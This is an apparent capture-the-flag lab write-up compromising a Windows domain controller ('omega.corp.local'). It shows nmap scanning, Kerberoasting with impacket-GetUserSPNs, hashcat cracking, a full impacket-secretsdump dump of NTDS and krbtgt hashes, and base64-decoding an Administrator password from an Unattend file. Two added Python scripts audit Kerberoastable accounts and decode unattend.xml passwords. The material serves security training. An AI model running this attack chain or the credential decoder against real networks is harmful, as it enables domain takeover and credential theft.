For this room, we are given known user credentials:

Username: corp\dark
Password: _QuejVudId6

Initial Scan

nmap -Pn -A 10.10.150.225
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 18:28 EDT
Nmap scan report for 10.10.150.225
Host is up (0.20s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-18 22:28:42Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=omega.corp.local
| Not valid before: 2024-09-17T21:33:32
|_Not valid after:  2025-03-19T21:33:32
|_ssl-date: 2024-09-18T22:29:33+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: OMEGA
|   DNS_Domain_Name: corp.local
|   DNS_Computer_Name: omega.corp.local
|   DNS_Tree_Name: corp.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-09-18T22:28:53+00:00
Service Info: Host: OMEGA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-18T22:28:57
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.33 seconds

The host appears to be a domain controller (omega.corp.local, CORP domain) with RDP exposed.

Impacket

GetUserSPNs

impacket-GetUserSPNs corp.local/dark -dc-ip 10.10.150.225 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
ServicePrincipalName  Name  MemberOf                                    PasswordLastSet             LastLogon                   Delegation 
--------------------  ----  ------------------------------------------  --------------------------  --------------------------  ----------
HTTP/fela             fela  CN=Domain Admins,CN=Users,DC=corp,DC=local  2019-10-09 13:54:40.905204  2019-10-10 23:39:12.562404             
HOST/fela@corp.local  fela  CN=Domain Admins,CN=Users,DC=corp,DC=local  2019-10-09 13:54:40.905204  2019-10-10 23:39:12.562404             
HTTP/fela@corp.local  fela  CN=Domain Admins,CN=Users,DC=corp,DC=local  2019-10-09 13:54:40.905204  2019-10-10 23:39:12.562404             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*fela$CORP.LOCAL$corp.local/fela*$00735746f0ce46a5f7d2d9bebacf0969$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

Cracking the ticket with hashcat -m 13100 fela-hash.txt /usr/share/wordlist/rockyou.txt recovers the password RubenF124.
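The GetUserSPNs table above is the defender's checklist as much as the attacker's: a Domain Admin with a SPN and a password last set in 2019 is the worst case. The following added example (not part of the original write-up or of Impacket) parses that table format, deriving column edges from the dashed underline so empty cells survive, and flags accounts that are privileged or have stale passwords; the group list, the one-year threshold and the second sample row are assumptions.

```python
"""Flag high-risk Kerberoast targets in impacket-GetUserSPNs output (added
example, not from the write-up or from Impacket). Column edges are read from
the dashed underline row, so an empty MemberOf cell parses correctly. The
privileged-group list and one-year threshold are assumptions; rows are constructed.
"""
import re
from datetime import datetime

PRIVILEGED_GROUPS = ("CN=Domain Admins", "CN=Enterprise Admins", "CN=Administrators")
COLUMNS = ("ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon", "Delegation")
WIDTHS = (20, 7, 42, 26, 26, 10)

def _row(*cells):
    """Pad cells the way Impacket prints its table: left-justified, two-space gutter."""
    return "  ".join(c.ljust(w) for c, w in zip(cells, WIDTHS))

SAMPLE = "\n".join([
    _row(*COLUMNS),
    _row(*("-" * w for w in WIDTHS)),
    _row("HTTP/fela", "fela", "CN=Domain Admins,CN=Users,DC=corp,DC=local",
         "2019-10-09 13:54:40.905204", "2019-10-10 23:39:12.562404", ""),
    _row("MSSQLSvc/db01:1433", "svc_sql", "",
         "2024-08-01 09:00:00.000000", "2024-09-01 08:00:00.000000", ""),
])

def parse_spn_table(text):
    """Return one dict per data row, keyed by the header names."""
    lines = [line for line in text.splitlines() if line.strip()]
    header, dashes, rows = lines[0], lines[1], lines[2:]
    # Each run of '-' in the underline marks exactly one column's extent.
    bounds = [(m.start(), m.end()) for m in re.finditer(r"-+", dashes)]
    names = [header[a:b].strip() for a, b in bounds]
    return [dict(zip(names, (row[a:b].strip() for a, b in bounds))) for row in rows]

def assess(records, now, max_age_days=365):
    """Return (name, spn, reasons) for the accounts to fix first."""
    findings = []
    for r in records:
        reasons = []
        if any(g in r["MemberOf"] for g in PRIVILEGED_GROUPS):
            reasons.append("SPN set on a privileged account")
        if r["PasswordLastSet"] and not r["PasswordLastSet"].startswith("<"):
            age = (now - datetime.strptime(r["PasswordLastSet"], "%Y-%m-%d %H:%M:%S.%f")).days
            if age > max_age_days:
                reasons.append(f"password unchanged for {age} days")
        if reasons:
            findings.append((r["Name"], r["ServicePrincipalName"], reasons))
    return findings

def audit_sample(now=datetime(2024, 9, 18)):
    """Run the audit over the constructed sample as of the scan date."""
    return assess(parse_spn_table(SAMPLE), now)
```

Feed it the real tool output instead of SAMPLE and every flagged account is one whose password should be rotated to a long random value (or moved to a group Managed Service Account) before anyone else requests its ticket.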

Secretsdump

impacket-secretsdump fela@10.10.150.225
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf34eeca496d6501d9d6a2affb8ed97b0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4f4a4a1f282b3b51a3d57aecc23ca084:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
CORP\OMEGA$:aes256-cts-hmac-sha1-96:e6383041c9bd3d67f482fa99ff0737156cbea5fcac57ccbdc6ecd78dbfd73f27
CORP\OMEGA$:aes128-cts-hmac-sha1-96:9152351754140a851b5b06e28bc0b2fd
CORP\OMEGA$:des-cbc-md5:70efdfd0e0f75175
CORP\OMEGA$:plain_password_hex:19b2ce9ea75b9be26eb318f377421fe6ca3539225bad7457f98e0854de613076f08d6d3987eb1cebf91226594b104162a9c807cd0afa3b8872ebbdff5b7515de3ad17409c91777c83bfe15666884c4b34657029246d0f4da2bc397825c348b2e0d21e933305e8d1096beae11d945fac4ff3652a617677224b2ab27488e0c3a7d167ce160d136e58e0d123ab4e84acbdbc72408cff4a65e22fda73df757f1b15123713921def67482a8983e2f5c6df5683078fd32b271b1c5a4a9ccf5a3a9808ef39747437a61de4e3bf69f45d7b970c47a2d3b161fae0ca2bf8f0d697c7b5d1596e66b3abf475991efb4be6d972d1334
CORP\OMEGA$:aad3b435b51404eeaad3b435b51404ee:309ba72b55e002a6135728501682e405:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x12d33b66b64dd47d29306031505c48c010eaa5e9
dpapi_userkey:0xc0e9a6202b6e048ecc6510c57f4ee55b10dabf7f
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f
 0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..
 0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[
 0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd839bd6be092b794013e25068820d15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:282553039baf6af1231d797992eb9d88:::
corp.local\fela:1132:aad3b435b51404eeaad3b435b51404ee:f0c9407ac6b882d8ee897a4290324807:::
corp.local\dark:1134:aad3b435b51404eeaad3b435b51404ee:1e933fd0cee562288abc9bddccd8c8ce:::
OMEGA$:1009:aad3b435b51404eeaad3b435b51404ee:309ba72b55e002a6135728501682e405:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:099a54fc06b02195e7559b58ecbfeb80f86c6d9141e00f530d5b8a497c01d289
Administrator:aes128-cts-hmac-sha1-96:1f7803cb3e656f8da4efe5bf42df0a8b
Administrator:des-cbc-md5:7629a467c7a42fe0
krbtgt:aes256-cts-hmac-sha1-96:e4c8912572c53c3335478aa9b224631baaa0478572ae4043c9be246a85717d25
krbtgt:aes128-cts-hmac-sha1-96:d126bf12602108ba9ac351ef7c5f3966
krbtgt:des-cbc-md5:cd7cd53ba285cb1c
corp.local\fela:aes256-cts-hmac-sha1-96:c2cd88039840a8041f682116987085b4f1542ba23e6d4f1c35e30e94805e8f17
corp.local\fela:aes128-cts-hmac-sha1-96:d20625ddf73e31ea4ff960365c19ec13
corp.local\fela:des-cbc-md5:c45732734c91ec7f
corp.local\dark:aes256-cts-hmac-sha1-96:2b8b4b3ad70fae63ac290fa4547509127960c5c0abd1b17e10624aa531ed46f4
corp.local\dark:aes128-cts-hmac-sha1-96:dcd64c0eeb1d1655976c1b564636920e
corp.local\dark:des-cbc-md5:b9d3ab4a46adda4c
OMEGA$:aes256-cts-hmac-sha1-96:e6383041c9bd3d67f482fa99ff0737156cbea5fcac57ccbdc6ecd78dbfd73f27
OMEGA$:aes128-cts-hmac-sha1-96:9152351754140a851b5b06e28bc0b2fd
OMEGA$:des-cbc-md5:8626dce39da8203b
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f0bdbb3e340>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 182, in __del__
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 179, in close
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 358, in close
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 603, in closeFile
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1354, in close
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 471, in sendSMB
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 440, in signSMB
  File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 148, in AES_CMAC
  File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f0bdbb3e340>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 182, in __del__
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 179, in close
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 358, in close
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 603, in closeFile
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1354, in close
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 471, in sendSMB
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 440, in signSMB
  File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 148, in AES_CMAC
  File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'

There are a few things of interest here, but trying to crack the Administrator hash is not practical.

Running WinPEAS or PowerUp on the host reveals an XML file with a password stored in clear text (only base64-encoded).

The Administrator password was in:

C:\Windows\Panther\Unattend

Decoding the base64 value inside it gave the password, which was then used to log in and grab the last flag.
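Leftover unattend.xml files are a recurring finding because Setup only obfuscates the passwords: a PlainText=false value is base64 of the UTF-16LE password with a fixed suffix appended ("AdministratorPassword" for the AdministratorPassword element, "Password" for LocalAccount and AutoLogon passwords). The following added example (not part of the original write-up) walks an answer file, undoes that encoding and handles the PlainText=true case; the sample file and both passwords in it are constructed.

```python
"""Find credentials left behind in an unattend.xml answer file (added example,
not from the original write-up). Setup stores a PlainText=false password as
base64(UTF-16LE(password + suffix)); the suffix is "AdministratorPassword"
for AdministratorPassword and "Password" for LocalAccount/AutoLogon. The
sample file is constructed.
"""
import base64
import xml.etree.ElementTree as ET

NS = "{urn:schemas-microsoft-com:unattend}"
SUFFIXES = {"AdministratorPassword": "AdministratorPassword", "Password": "Password"}

def encode_value(password, suffix):
    """Reproduce Setup's obfuscation (used only to build the sample)."""
    return base64.b64encode((password + suffix).encode("utf-16-le")).decode()

def decode_value(value, suffix):
    """Reverse it; None means the value was not encoded the expected way."""
    text = base64.b64decode(value).decode("utf-16-le")
    return text[:-len(suffix)] if text.endswith(suffix) else None

def extract_credentials(xml_text):
    """Yield (element_tag, recovered_password) for every password element."""
    root = ET.fromstring(xml_text)
    for tag, suffix in SUFFIXES.items():
        for node in root.iter(NS + tag):
            value = node.findtext(NS + "Value")
            if value is None:
                continue
            plain = (node.findtext(NS + "PlainText") or "false").lower() == "true"
            yield tag, value if plain else decode_value(value, suffix)

# Constructed sample answer file; both passwords are made up.
SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts><AdministratorPassword>
        <Value>{encode_value('Example-Admin-Pass1', 'AdministratorPassword')}</Value>
        <PlainText>false</PlainText>
      </AdministratorPassword></UserAccounts>
      <AutoLogon><Username>Administrator</Username><Enabled>true</Enabled>
        <Password><Value>Example-AutoLogon2</Value><PlainText>true</PlainText></Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>"""

def audit_sample():
    """Run the extractor over the constructed sample."""
    return list(extract_credentials(SAMPLE_UNATTEND))
```

Pointed at C:\Windows\Panther and C:\Windows\System32\Sysprep on a built image, any non-empty result means the file should be deleted and the account's password rotated.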